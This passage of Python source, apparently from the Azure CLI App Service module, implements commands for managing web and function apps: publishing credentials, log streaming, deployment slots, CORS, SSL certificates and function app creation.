'h': frequency_unit = FrequencyUnit.hour else: raise CLIError('Frequency must end with d or h for "day" or "hour"') try: frequency_num = int(frequency[:-1]) except ValueError: raise CLIError('Frequency must start with a number') if frequency_num < 0: raise CLIError('Frequency must be positive') return frequency_num, frequency_unit def _get_location_from_resource_group(cli_ctx, resource_group_name): client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES) group = client.resource_groups.get(resource_group_name) return group.location def _get_location_from_webapp(client, resource_group_name, webapp): webapp = client.web_apps.get(resource_group_name, webapp) if not webapp: raise CLIError("'{}' app doesn't exist".format(webapp)) return webapp.location def _get_deleted_apps_locations(cli_ctx): client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES) web_provider = client.providers.get('Microsoft.Web') del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None) if del_sites_resource: return del_sites_resource.locations return [] def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None): user = client.get_publishing_user() result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot) parsed = urlparse(result.repo_url) return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name, parsed.netloc, name) def _get_scm_url(cmd, resource_group_name, name, slot=None): from azure.mgmt.web.models import HostType webapp = show_webapp(cmd, resource_group_name, name, slot=slot) for host in webapp.host_name_ssl_states or []: if host.host_type == HostType.repository: return "https://{}".format(host.name) # this should not happen, but throw anyway raise ValueError('Failed to retrieve Scm Uri') def get_publishing_user(cmd): client = web_client_factory(cmd.cli_ctx) return client.get_publishing_user() def set_deployment_user(cmd, user_name, password=None): ''' Update deployment credentials.(Note, all webapps in your subscription will be impacted) ''' User = cmd.get_models('User') client = web_client_factory(cmd.cli_ctx) user = User(publishing_user_name=user_name) if password is None: try: password = prompt_pass(msg='Password: ', confirm=True) except NoTTYException: raise CLIError('Please specify both username and password in non-interactive mode.') user.publishing_password = password return client.update_publishing_user(user) def list_publishing_credentials(cmd, resource_group_name, name, slot=None): content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot) return content.result() def list_publish_profiles(cmd, resource_group_name, name, slot=None): import xmltodict content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_publishing_profile_xml_with_secrets', slot) full_xml = '' for f in content: full_xml += f.decode() profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile'] converted = [] for profile in profiles: new = {} for key in profile: # strip the leading '@' xmltodict put in for attributes new[key.lstrip('@')] = profile[key] converted.append(new) return converted def enable_cd(cmd, resource_group_name, name, enable, slot=None): settings = [] settings.append("DOCKER_ENABLE_CI=" + enable) update_app_settings(cmd, resource_group_name, name, settings, slot) return show_container_cd_url(cmd, resource_group_name, name, slot) def show_container_cd_url(cmd, resource_group_name, name, slot=None): settings = get_app_settings(cmd, resource_group_name, name, slot) docker_enabled = False for setting in settings: if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true': docker_enabled = True break cd_settings = {} cd_settings['DOCKER_ENABLE_CI'] = docker_enabled if docker_enabled: credentials = list_publishing_credentials(cmd, resource_group_name, name, slot) if credentials: cd_url = credentials.scm_uri + '/docker/hook' cd_settings['CI_CD_URL'] = cd_url else: cd_settings['CI_CD_URL'] = '' return cd_settings def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False): url = _get_url(cmd, resource_group_name, name, slot) open_page_in_browser(url) if logs: get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot) def _get_url(cmd, resource_group_name, name, slot=None): SslState = cmd.get_models('SslState') site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot) if not site: raise CLIError("'{}' app doesn't exist".format(name)) url = site.enabled_host_names[0] # picks the custom domain URL incase a domain is assigned ssl_host = next((h for h in site.host_name_ssl_states if h.ssl_state != SslState.disabled), None) return ('https' if ssl_host else 'http') + '://' + url # TODO: expose new blob suport def config_diagnostics(cmd, resource_group_name, name, level=None, application_logging=None, web_server_logging=None, docker_container_logging=None, detailed_error_messages=None, failed_request_tracing=None, slot=None): from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig, SiteLogsConfig, HttpLogsConfig, FileSystemHttpLogsConfig, EnabledConfig) client = web_client_factory(cmd.cli_ctx) # TODO: ensure we call get_site only once site = client.web_apps.get(resource_group_name, name) if not site: raise CLIError("'{}' app doesn't exist".format(name)) location = site.location application_logs = None if application_logging is not None: if not application_logging: level = 'Off' elif level is None: level = 'Error' fs_log = FileSystemApplicationLogsConfig(level=level) application_logs = ApplicationLogsConfig(file_system=fs_log) http_logs = None server_logging_option = web_server_logging or docker_container_logging if server_logging_option: # TODO: az blob storage log config currently not in use, will be impelemented later. # Tracked as Issue: #4764 on Github filesystem_log_config = None turned_on = server_logging_option != 'off' if server_logging_option in ['filesystem', 'off']: # 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3, enabled=turned_on) http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None) detailed_error_messages_logs = (None if detailed_error_messages is None else EnabledConfig(enabled=detailed_error_messages)) failed_request_tracing_logs = (None if failed_request_tracing is None else EnabledConfig(enabled=failed_request_tracing)) site_log_config = SiteLogsConfig(location=location, application_logs=application_logs, http_logs=http_logs, failed_requests_tracing=failed_request_tracing_logs, detailed_error_messages=detailed_error_messages_logs) return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config', slot, site_log_config) def show_diagnostic_settings(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot) def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None): client = web_client_factory(cmd.cli_ctx) site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot) site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production') return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot) def list_slots(cmd, resource_group_name, webapp): client = web_client_factory(cmd.cli_ctx) slots = list(client.web_apps.list_slots(resource_group_name, webapp)) for slot in slots: slot.name = slot.name.split('/')[-1] setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name']) del slot.server_farm_id return slots def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'): client = web_client_factory(cmd.cli_ctx) if action == 'swap': poller = client.web_apps.swap_slot_slot(resource_group_name, webapp, slot, (target_slot or 'production'), True) return poller if action == 'preview': if target_slot is None: result = client.web_apps.apply_slot_config_to_production(resource_group_name, webapp, slot, True) else: result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp, slot, target_slot, True) return result # we will reset both source slot and target slot if target_slot is None: client.web_apps.reset_production_slot_config(resource_group_name, webapp) else: client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot) return None def delete_slot(cmd, resource_group_name, webapp, slot): client = web_client_factory(cmd.cli_ctx) # TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc... client.web_apps.delete_slot(resource_group_name, webapp, slot) def set_traffic_routing(cmd, resource_group_name, name, distribution): RampUpRule = cmd.get_models('RampUpRule') client = web_client_factory(cmd.cli_ctx) site = client.web_apps.get(resource_group_name, name) if not site: raise CLIError("'{}' app doesn't exist".format(name)) configs = get_site_configs(cmd, resource_group_name, name) host_name_split = site.default_host_name.split('.', 1) host_name_suffix = '.' + host_name_split[1] host_name_val = host_name_split[0] configs.experiments.ramp_up_rules = [] for r in distribution: slot, percentage = r.split('=') action_host_name_slot = host_name_val + "-" + slot configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix, reroute_percentage=float(percentage), name=slot)) _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs) return configs.experiments.ramp_up_rules def show_traffic_routing(cmd, resource_group_name, name): configs = get_site_configs(cmd, resource_group_name, name) return configs.experiments.ramp_up_rules def clear_traffic_routing(cmd, resource_group_name, name): set_traffic_routing(cmd, resource_group_name, name, []) def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None): from azure.mgmt.web.models import CorsSettings configs = get_site_configs(cmd, resource_group_name, name, slot) if not configs.cors: configs.cors = CorsSettings() configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs) return result.cors def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None): configs = get_site_configs(cmd, resource_group_name, name, slot) if configs.cors: if allowed_origins: configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins] else: configs.cors.allowed_origins = [] configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs) return configs.cors def show_cors(cmd, resource_group_name, name, slot=None): configs = get_site_configs(cmd, resource_group_name, name, slot) return configs.cors def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None): scm_url = _get_scm_url(cmd, resource_group_name, name, slot) streaming_url = scm_url + '/logstream' if provider: streaming_url += ('/' + provider.lstrip('/')) user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot) t = threading.Thread(target=_get_log, args=(streaming_url, user, password)) t.daemon = True t.start() while True: time.sleep(100) # so that ctrl+c can stop the command def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None): scm_url = _get_scm_url(cmd, resource_group_name, name, slot) url = scm_url.rstrip('/') + '/dump' user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot) _get_log(url, user_name, password, log_file) logger.warning('Downloaded logs to %s', log_file) def _get_site_credential(cli_ctx, resource_group_name, name, slot=None): creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot) creds = creds.result() return (creds.publishing_user_name, creds.publishing_password) def _get_log(url, user_name, password, log_file=None): import certifi import urllib3 try: import urllib3.contrib.pyopenssl urllib3.contrib.pyopenssl.inject_into_urllib3() except ImportError: pass http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where()) headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password)) r = http.request( 'GET', url, headers=headers, preload_content=False ) if r.status != 200: raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format( url, r.status, r.reason)) if log_file: # download logs with open(log_file, 'wb') as f: while True: data = r.read(1024) if not data: break f.write(data) else: # streaming std_encoding = sys.stdout.encoding for chunk in r.stream(): if chunk: # Extra encode() and decode for stdout which does not surpport 'utf-8' print(chunk.decode(encoding='utf-8', errors='replace') .encode(std_encoding, errors='replace') .decode(std_encoding, errors='replace'), end='') # each line of log has CRLF. r.release_conn() def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None): Certificate = cmd.get_models('Certificate') client = web_client_factory(cmd.cli_ctx) webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot) cert_file = open(certificate_file, 'rb') cert_contents = cert_file.read() hosting_environment_profile_param = (webapp.hosting_environment_profile.name if webapp.hosting_environment_profile else '') thumb_print = _get_cert(certificate_password, certificate_file) cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param, webapp.location, resource_group_name) cert = Certificate(password=certificate_password, pfx_blob=cert_contents, location=webapp.location, server_farm_id=webapp.server_farm_id) return client.certificates.create_or_update(resource_group_name, cert_name, cert) def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name): return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name) def _get_cert(certificate_password, certificate_file): ''' Decrypts the .pfx file ''' p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password) cert = p12.get_certificate() digest_algorithm = 'sha1' thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '') return thumbprint def list_ssl_certs(cmd, resource_group_name): client = web_client_factory(cmd.cli_ctx) return client.certificates.list_by_resource_group(resource_group_name) def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint): client = web_client_factory(cmd.cli_ctx) webapp_certs = client.certificates.list_by_resource_group(resource_group_name) for webapp_cert in webapp_certs: if webapp_cert.thumbprint == certificate_thumbprint: return client.certificates.delete(resource_group_name, webapp_cert.name) raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint)) def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name): Certificate = cmd.get_models('Certificate') client = web_client_factory(cmd.cli_ctx) webapp = client.web_apps.get(resource_group_name, name) if not webapp: raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name)) server_farm_id = webapp.server_farm_id location = webapp.location kv_id = _format_key_vault_id(cmd.cli_ctx, key_vault, resource_group_name) kv_id_parts = parse_resource_id(kv_id) kv_name = kv_id_parts['name'] kv_resource_group_name = kv_id_parts['resource_group'] cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name) lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html' lnk_msg = 'Find more details here: {}'.format(lnk) if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name): logger.warning('Unable to verify Key Vault permissions.') logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission') logger.warning(lnk_msg) kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='', key_vault_secret_name=key_vault_certificate_name, server_farm_id=server_farm_id) return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name, certificate_envelope=kv_cert_def) def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None): Certificate = cmd.get_models('Certificate') hostname = hostname.lower() client = web_client_factory(cmd.cli_ctx) webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot) if not webapp: slot_text = "Deployment slot {} in ".format(slot) if slot else '' raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name)) parsed_plan_id = parse_resource_id(webapp.server_farm_id) plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name']) if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED': raise CLIError('Managed Certificate is not supported on Free and Shared tier.') if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot): slot_text = " --slot {}".format(slot) if slot else "" raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. " "Use 'az webapp config hostname add --resource-group {2} " "--webapp-name {1}{3} --hostname {0}' " "to register the hostname.".format(hostname, name, resource_group_name, slot_text)) server_farm_id = webapp.server_farm_id location = webapp.location easy_cert_def = Certificate(location=location, canonical_name=hostname, server_farm_id=server_farm_id, password='') return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name, certificate_envelope=easy_cert_def) def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name): from azure.cli.command_modules.keyvault._client_factory import keyvault_client_vaults_factory from azure.cli.command_modules.role._client_factory import _graph_client_factory from azure.graphrbac.models import GraphErrorException kv_client = keyvault_client_vaults_factory(cmd.cli_ctx, None) vault = kv_client.get(resource_group_name=resource_group_name, vault_name=key_vault_name) # Check for Microsoft.Azure.WebSites app registration AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd' AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714' graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals for policy in vault.properties.access_policies: try: sp = graph_sp_client.get(policy.object_id) if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID: for perm in policy.permissions.secrets: if perm == "Get": return True except GraphErrorException: pass # Lookup will fail for non service principals (users, groups, etc.) return False def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp, host_name, ssl_state, thumbprint, slot=None): Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState') updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name, ssl_state=ssl_state, thumbprint=thumbprint, to_update=True)], location=webapp.location, tags=webapp.tags) return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'create_or_update', slot, updated_webapp) def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None): client = web_client_factory(cmd.cli_ctx) webapp = client.web_apps.get(resource_group_name, name) if not webapp: raise CLIError("'{}' app doesn't exist".format(name)) cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group'] webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name) for webapp_cert in webapp_certs: if webapp_cert.thumbprint == certificate_thumbprint: if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'): return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp, webapp_cert.host_names[0], ssl_type, certificate_thumbprint, slot) query_result = list_hostnames(cmd, resource_group_name, name, slot) hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result] to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp) for h in to_update: _update_host_name_ssl_state(cmd, resource_group_name, name, webapp, h, ssl_type, certificate_thumbprint, slot) return show_webapp(cmd, resource_group_name, name, slot) raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint)) def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None): SslState = cmd.get_models('SslState') return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot) def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None): SslState = cmd.get_models('SslState') return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, SslState.disabled, slot) def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp): # the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc matched = set() for hostname in hostnames_from_cert: if hostname.startswith('*'): for h in hostnames_in_webapp: if hostname[hostname.find('.'):] == h[h.find('.'):]: matched.add(h) elif hostname in hostnames_in_webapp: matched.add(hostname) return matched # help class handles runtime stack in format like 'node|6.1', 'php|5.5' class _StackRuntimeHelper(object): def __init__(self, cmd, client, linux=False): self._cmd = cmd self._client = client self._linux = linux self._stacks = [] def resolve(self, display_name): self._load_stacks() return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()), None) @property def stacks(self): self._load_stacks() return self._stacks @staticmethod def update_site_config(stack, site_config, cmd=None): for k, v in stack['configs'].items(): setattr(site_config, k, v) return site_config @staticmethod def update_site_appsettings(cmd, stack, site_config): NameValuePair = cmd.get_models('NameValuePair') if site_config.app_settings is None: site_config.app_settings = [] site_config.app_settings += [NameValuePair(name=k, value=v) for k, v in stack['configs'].items()] return site_config def _load_stacks(self): if self._stacks: return os_type = ('Linux' if self._linux else 'Windows') raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True) bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access json_value = bytes_value.decode('utf8') json_stacks = json.loads(json_value) stacks = json_stacks['value'] result = [] if self._linux: for properties in [(s['properties']) for s in stacks]: for major in properties['majorVersions']: default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']), None) result.append({ 'displayName': (default_minor['runtimeVersion'] if default_minor else major['runtimeVersion']) }) else: # Windows stacks config_mappings = { 'node': 'WEBSITE_NODE_DEFAULT_VERSION', 'python': 'python_version', 'php': 'php_version', 'aspnet': 'net_framework_version' } # get all stack version except 'java' for stack in stacks: if stack['name'] not in config_mappings: continue name, properties = stack['name'], stack['properties'] for major in properties['majorVersions']: default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']), None) result.append({ 'displayName': name + '|' + major['displayVersion'], 'configs': { config_mappings[name]: (default_minor['runtimeVersion'] if default_minor else major['runtimeVersion']) } }) # deal with java, which pairs with java container version java_stack = next((s for s in stacks if s['name'] == 'java')) java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers')) for java_version in java_stack['properties']['majorVersions']: for fx in java_container_stack['properties']['frameworks']: for fx_version in fx['majorVersions']: result.append({ 'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'], fx['display'], fx_version['displayVersion']), 'configs': { 'java_version': java_version['runtimeVersion'], 'java_container': fx['name'], 'java_container_version': fx_version['runtimeVersion'] } }) for r in result: r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in r['displayName'] else _StackRuntimeHelper.update_site_config) self._stacks = result def get_app_insights_key(cli_ctx, resource_group, name): appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient) appinsights = appinsights_client.components.get(resource_group, name) if appinsights is None or appinsights.instrumentation_key is None: raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group)) return appinsights.instrumentation_key def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku, number_of_workers=None, max_burst=None, location=None, tags=None): SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan') sku = _normalize_sku(sku) tier = get_sku_name(sku) if max_burst is not None: if tier.lower() != "elasticpremium": raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans") max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20) if number_of_workers is not None: number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count', number_of_workers, min_val=0, max_val=20) client = web_client_factory(cmd.cli_ctx) if location is None: location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name) sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers) plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def, reserved=(is_linux or None), maximum_elastic_worker_count=max_burst, hyper_v=None, name=name) return client.app_service_plans.create_or_update(resource_group_name, name, plan_def) def is_plan_consumption(cmd, plan_info): SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan') if isinstance(plan_info, AppServicePlan): if isinstance(plan_info.sku, SkuDescription): return plan_info.sku.tier.lower() == 'dynamic' return False def is_plan_elastic_premium(cmd, plan_info): SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan') if isinstance(plan_info, AppServicePlan): if isinstance(plan_info.sku, SkuDescription): return plan_info.sku.tier == 'ElasticPremium' return False def validate_and_convert_to_int(flag, val): try: return int(val) except ValueError: raise CLIError("Usage error: {} is expected to have an int value.".format(flag)) def validate_range_of_int_flag(flag_name, value, min_val, max_val): value = validate_and_convert_to_int(flag_name, value) if min_val > value or value > max_val: raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val, max_val)) return value def create_function(cmd, resource_group_name, name, storage_account, plan=None, os_type=None, functions_version=None, runtime=None, runtime_version=None, consumption_plan_location=None, app_insights=None, app_insights_key=None, disable_app_insights=None, deployment_source_url=None, deployment_source_branch='master', deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None, deployment_container_image_name=None, tags=None): # pylint: disable=too-many-statements, too-many-branches if functions_version is None: logger.warning("No functions version specified so defaulting to 2. In the future, specifying a version will " "be required. To create a 2.x function you would pass in the flag `--functions-version 2`") functions_version = '2' if deployment_source_url and deployment_local_git: raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git') if bool(plan) == bool(consumption_plan_location): raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION") SiteConfig, Site, NameValuePair = cmd.get_models('SiteConfig', 'Site', 'NameValuePair') docker_registry_server_url = parse_docker_image_name(deployment_container_image_name) site_config = SiteConfig(app_settings=[]) functionapp_def = Site(location=None, site_config=site_config, tags=tags) client = web_client_factory(cmd.cli_ctx) plan_info = None if runtime is not None: runtime = runtime.lower() if consumption_plan_location: locations = list_consumption_locations(cmd) location = next((l for l in locations if l['name'].lower() == consumption_plan_location.lower()), None) if location is None: raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations") functionapp_def.location = consumption_plan_location functionapp_def.kind = 'functionapp' # if os_type is None, the os type is windows is_linux = os_type and os_type.lower() == 'linux' else: # apps with SKU based plan if is_valid_resource_id(plan): parse_result = parse_resource_id(plan) plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name']) else: plan_info = client.app_service_plans.get(resource_group_name, plan) if not plan_info: raise CLIError("The plan '{}' doesn't exist".format(plan)) location = plan_info.location is_linux = plan_info.reserved functionapp_def.server_farm_id = plan functionapp_def.location = location if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name): raise CLIError( "usage error: --runtime RUNTIME required for linux functions apps without custom image.") if runtime: if is_linux and runtime not in LINUX_RUNTIMES: raise CLIError("usage error: Currently supported runtimes (--runtime) in linux function apps are: {}." .format(', '.join(LINUX_RUNTIMES))) if not is_linux and runtime not in WINDOWS_RUNTIMES: raise CLIError("usage error: Currently supported runtimes (--runtime) in windows function apps are: {}." .format(', '.join(WINDOWS_RUNTIMES))) site_config.app_settings.append(NameValuePair(name='FUNCTIONS_WORKER_RUNTIME', value=runtime)) if runtime_version is not None: if runtime is None: raise CLIError('Must specify --runtime to use --runtime-version') allowed_versions = RUNTIME_TO_IMAGE_FUNCTIONAPP[functions_version][runtime].keys() if runtime_version not in allowed_versions: raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and ' '--functions_version {}. Supported versions are: {}' .format(runtime_version, runtime, functions_version, ', '.join(allowed_versions))) con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account) if is_linux: functionapp_def.kind = 'functionapp,linux' functionapp_def.reserved = True is_consumption = consumption_plan_location is not None if not is_consumption: site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey', value=str(hexlify(urandom(32)).decode()).upper())) if deployment_container_image_name: functionapp_def.kind = 'functionapp,linux,container' site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME', value=deployment_container_image_name)) site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly')) site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE', value='false')) site_config.linux_fx_version = _format_fx_version(deployment_container_image_name) else: site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE', value='true')) if runtime not in RUNTIME_TO_IMAGE_FUNCTIONAPP[functions_version].keys(): raise CLIError("An appropriate linux image for runtime:'{}' was not found".format(runtime)) if deployment_container_image_name is None: site_config.linux_fx_version = _get_linux_fx_functionapp(is_consumption, functions_version, runtime, runtime_version) else: functionapp_def.kind = 'functionapp' # adding appsetting to site to make it a function site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value=_get_extension_version_functionapp(functions_version))) site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string)) site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string)) site_config.app_settings.append(NameValuePair(name='WEBSITE_NODE_DEFAULT_VERSION', value=_get_website_node_version_functionapp(functions_version, runtime, runtime_version))) # If plan is not consumption or elastic premium, we need to set always on if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info): site_config.always_on = True # If plan is elastic premium or windows consumption, we need these app settings is_windows_consumption = consumption_plan_location is not None and not is_linux if is_plan_elastic_premium(cmd, plan_info) or is_windows_consumption: site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING', value=con_string)) site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower())) create_app_insights = False if app_insights_key is not None: site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY', value=app_insights_key)) elif app_insights is not None: instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights) site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY', value=instrumentation_key)) elif not disable_app_insights: create_app_insights = True poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def) functionapp = LongRunningOperation(cmd.cli_ctx)(poller) if consumption_plan_location and is_linux: logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully" "created but is not active until content is published using" "Azure Portal or the Functions Core Tools.", name) else: _set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url, deployment_source_branch, deployment_local_git) if create_app_insights: try: try_create_application_insights(cmd, functionapp) except Exception: # pylint: disable=broad-except logger.warning('Error while trying to create and configure an Application Insights for the Function App. ' 'Please use the Azure Portal to create and configure the Application Insights, if needed.') if deployment_container_image_name: update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url, deployment_container_image_name, docker_registry_server_user, docker_registry_server_password) return functionapp def _get_extension_version_functionapp(functions_version): if functions_version is not None: return '~{}'.format(functions_version) return '~2' def _get_linux_fx_functionapp(is_consumption, functions_version, runtime, runtime_version): if runtime_version is None: runtime_version = RUNTIME_TO_DEFAULT_VERSION_FUNCTIONAPP[functions_version][runtime] if is_consumption: return '{}|{}'.format(runtime.upper(), runtime_version) # App service or Elastic Premium return _format_fx_version(RUNTIME_TO_IMAGE_FUNCTIONAPP[functions_version][runtime][runtime_version]) def _get_website_node_version_functionapp(functions_version, runtime, runtime_version): if runtime is None or runtime != 'node': return NODE_VERSION_DEFAULT_FUNCTIONAPP[functions_version] if runtime_version is not None: return '~{}'.format(runtime_version) return NODE_VERSION_DEFAULT_FUNCTIONAPP[functions_version] def try_create_application_insights(cmd, functionapp): creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \ 'Please use the Azure Portal to manually create and configure the Application Insights, ' \ 'if needed.' ai_resource_group_name = functionapp.resource_group ai_name = functionapp.name ai_location = functionapp.location app_insights_client = get_mgmt_service_client(cmd.cli_ctx, 